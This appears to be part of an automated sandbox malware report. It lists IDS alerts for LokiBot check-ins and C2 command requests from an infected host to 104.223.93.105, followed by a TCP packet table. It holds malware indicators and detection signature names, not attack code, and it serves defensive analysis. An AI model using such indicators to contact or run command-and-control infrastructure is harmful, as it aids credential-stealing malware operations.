                    01/14/22-07:15:25.808698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.4104.223.93.105
                    01/14/22-07:15:25.808698TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.4104.223.93.105
                    01/14/22-07:15:25.808698TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2025381ET TROJAN LokiBot Checkin4987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2025381ET TROJAN LokiBot Checkin4989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.2.4104.223.93.105

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 07:15:13.939903975 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.064361095 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.064524889 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.068203926 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.192395926 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.192487955 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.320434093 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.326773882 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.327156067 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.327296972 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.339560032 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.464122057 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:15.648782969 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:15.771281004 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:15.771379948 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:15.774785995 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:15.897432089 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:15.897516012 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:16.019885063 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:16.029309988 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:16.029351950 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:16.029422998 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:16.029493093 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:16.152523994 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:16.883490086 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.007704020 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.007812977 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.010469913 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.134510994 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.134681940 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.259054899 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.266379118 CET8049767104.223.93.105192.168.2.4
